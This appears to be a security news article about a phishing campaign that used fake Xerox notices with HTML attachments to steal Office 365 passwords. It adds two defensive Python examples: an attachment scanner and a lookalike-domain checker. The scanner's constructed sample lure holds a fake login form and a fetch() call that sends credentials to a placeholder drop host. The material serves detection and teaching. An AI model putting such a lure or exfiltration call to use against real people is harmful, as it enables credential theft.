A major phishing campaign has recently been identified, targeting businesses worldwide and successfully circumventing Microsoft Office 365’s Advanced Threat Protection (ATP). This offensive has reportedly led to the credentials of over a thousand corporate employees being compromised, with origins traced back to August of the previous year. According to a joint analysis by Check Point Research and cybersecurity firm Otorio, energy and construction sectors appear to be the primary targets of these attacks.
What distinguishes this phishing operation is an apparent lapse in operational security that inadvertently exposed the stolen credentials on the public internet. Search engines could easily index these credentials, allowing bad actors unfettered access. “A simple Google search could have revealed the password for a compromised email address, effectively giving opportunistic attackers free rein,” the researchers stated.
The attack vector utilized phishing lures disguised as notifications from Xerox (or Xeros), which contained HTML file attachments. Upon opening these files, victims were prompted to enter their Office 365 passwords on a counterfeit login page. The submitted credentials were then sent to a remote server, where they were stored in a text file.
The JavaScript code responsible for credential exfiltration was reportedly refined to evade detection by most antivirus solutions, creating a “realistic” user experience designed to deceive victims into entering their login information. The attackers also leveraged specialized infrastructure, including compromised WordPress servers, as a “drop zone” for the stolen credentials. This method exploited the reputation of legitimate websites to evade heightened security scrutiny.
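The two traits described above, an HTML attachment carrying a password form and script-side exfiltration to a host that is not the brand being imitated, are exactly what a mail-gateway check can key on. The following is an added example of such a check, written for this page; it is not code from Check Point Research, Otorio, or the campaign itself. It assumes a defender-maintained allow-list of genuine sign-in hosts (`TRUSTED_LOGIN_HOSTS`, here just two Microsoft hosts) and uses a constructed lure (`SAMPLE_LURE`, with a placeholder `.example` host standing in for a compromised WordPress site) as input.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a genuine Office 365 sign-in form may post to.
# A real deployment would maintain this list per tenant.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class _FormScanner(HTMLParser):
    """Collects every <form> in the attachment and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # each entry: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


# Script-side exfiltration targets such as fetch("https://...") or
# xhr.open("POST", "https://...").
_JS_URL = re.compile(
    r"""(?:fetch|open)\s*\(\s*(?:["'][A-Z]+["']\s*,\s*)?["'](https?://[^"']+)["']""",
    re.I,
)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_html_attachment(html):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    scanner = _FormScanner()
    scanner.feed(html)
    for form in scanner.forms:
        if form["has_password"]:
            host = _host(form["action"])
            if host not in TRUSTED_LOGIN_HOSTS:
                # A relative or missing action usually means JavaScript submits the data.
                findings.append(
                    f"password form posts to untrusted host: {host or '(relative/none)'}"
                )
    for url in _JS_URL.findall(html):
        host = _host(url)
        if host not in TRUSTED_LOGIN_HOSTS:
            findings.append(f"script sends data to untrusted host: {host}")
    return findings


# Constructed sample: a minimal lure of the kind described in the article.
# blog-drop.example is a placeholder, not a real compromised site.
SAMPLE_LURE = """<html><body>
<h1>Xerox Scan: document ready</h1>
<form action="https://blog-drop.example/wp-content/uploads/post.php" method="post">
  <input name="email" value="victim@corp.example">
  <input type="password" name="pass">
  <button>Open document</button>
</form>
<script>
function send(d){ fetch("https://blog-drop.example/wp-content/uploads/post.php", {method:"POST", body:d}); }
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE_LURE):
        print("ALERT:", finding)
```

Run on the constructed lure it raises two findings, one for the form action and one for the `fetch` call, both pointing at the same placeholder drop host; a form posting to a host on the allow-list produces none. The allow-list approach is deliberately conservative: any password form in an attachment that does not post to a known sign-in host is worth quarantining, since legitimate mail has no reason to carry one at all.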
Due to the method of storage, the compromised credentials were indexed by search engines, offering unimpeded access to any malicious actor seeking these passwords. Researchers traced the emails associated with this campaign back to a Linux server hosted on the Microsoft Azure platform. The emails were distributed using PHP Mailer 6.1.5 and delivered through 1&1 Ionos email servers, indicating a sophisticated level of planning on the attackers’ part.
Given the nature of the email headers analyzed, it is likely that the compromised IONOS account credentials were instrumental in disseminating the Office 365-themed spam, a tactic that further underscores the breadth of the attackers’ strategy.
To counter such threats, monitoring for emails from unfamiliar sources and scrutinizing lookalike domains is critical. Users are urged to avoid clicking on dubious links and to uphold strong password hygiene to bolster their account security. According to Lotem Finkelsteen, head of threat intelligence at Check Point, “While many assume that stolen passwords will only be sold on the dark web, in this scenario, the entire public had access to the compromised information.”
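"Scrutinizing lookalike domains" is easy to say and tedious to do by eye, so here is an added example of how a sender-domain check can be automated; it is not code from the researchers quoted above. It assumes a small set of protected brand domains (`PROTECTED`, constructed for the example) and a two-label approximation of the registrable domain (it does not handle multi-part public suffixes such as co.uk). It goes a little beyond the article by covering several lookalike styles at once: confusable-character substitutions (rn for m, 0 for o), single-character typos such as the "Xeros" spelling mentioned earlier, the brand embedded in a longer hyphenated label, and the brand used as a subdomain of an unrelated site.

```python
# Assumption: brand domains this organisation wants to protect against imitation.
PROTECTED = {"microsoft.com", "office.com", "xerox.com"}

# Character sequences commonly swapped for each other in lookalike domains.
# Multi-character entries are listed first so they are applied before single ones.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"),
               ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def _levenshtein(a, b):
    """Edit distance between two strings (insert/delete/substitute, cost 1 each)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _skeleton(label):
    """Collapse confusable sequences so visually similar labels compare equal."""
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def classify_sender_domain(domain, protected=PROTECTED):
    """Return 'trusted', 'unknown', or a description of which brand the domain imitates."""
    labels = domain.lower().strip(".").split(".")
    registrable = ".".join(labels[-2:])   # assumption: two-label suffix handling only
    if registrable in protected:
        return "trusted"
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    tokens = sld.split("-")               # "microsoft-support" -> ["microsoft", "support"]
    for brand_domain in sorted(protected):
        brand = brand_domain.split(".")[0]
        threshold = max(1, len(brand) // 4)   # allow one typo per ~4 characters
        for tok in tokens:
            if tok == brand:
                return f"lookalike of {brand_domain} (brand name on a different domain)"
            if _skeleton(tok) == brand:
                return f"lookalike of {brand_domain} (confusable characters)"
            if _levenshtein(tok, brand) <= threshold:
                return f"lookalike of {brand_domain} (typosquat)"
        if brand in labels[:-2]:
            return f"lookalike of {brand_domain} (brand used as subdomain)"
    return "unknown"


if __name__ == "__main__":
    # Constructed sender domains; none of these are real campaign infrastructure.
    for d in ["microsoft.com", "rnicrosoft.com", "xeros-notifications.example",
              "login.microsoft.com-secure.example", "micros0ft-support.example", "example.org"]:
        print(f"{d:40s} -> {classify_sender_domain(d)}")
```

A gateway rule would feed the domain from the `From:` header (and, separately, the envelope sender, since the two often differ in phishing mail) into `classify_sender_domain` and route anything other than `trusted` or `unknown` to quarantine. The edit-distance threshold scales with the brand length so that short names such as "xerox" tolerate a single typo while longer ones tolerate two; tighten it if it produces false positives on your own legitimate partner domains.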
The attackers employed a strategy designed to consolidate stolen details on a designated webpage they had created. This method allowed them to periodically scan the compromised servers for credentials, unaware that search engines could easily do the same. This significant failure in operational security highlights the vulnerabilities that exist even among sophisticated cybercriminal operations.